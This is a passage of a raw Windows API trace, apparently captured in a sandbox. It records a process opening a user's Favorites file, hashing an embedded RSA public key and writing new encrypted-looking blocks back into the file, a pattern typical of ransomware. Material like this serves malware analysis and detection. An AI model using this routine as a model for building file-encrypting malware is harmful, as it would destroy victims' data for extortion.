hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.741] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0194.741] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.742] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.742] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.745] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.745] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.747] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.747] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.747] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.747] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.748] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.748] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.748] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.748] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.748] GetLastError () returned 0x0 [0194.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.748] GetLastError () returned 0x0 [0194.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.749] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.749] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.750] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.750] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.750] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.750] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2410 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae23c8 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.751] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0194.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0194.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6398 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0194.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.757] GetCurrentThreadId () returned 0x5d8 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7f08 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.758] GetCurrentThreadId () returned 0x5d8 [0194.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0194.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0194.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae23c8 | out: hHeap=0x2c0000) returned 1 [0194.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.820] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.821] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.821] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.823] HeapFree (in: 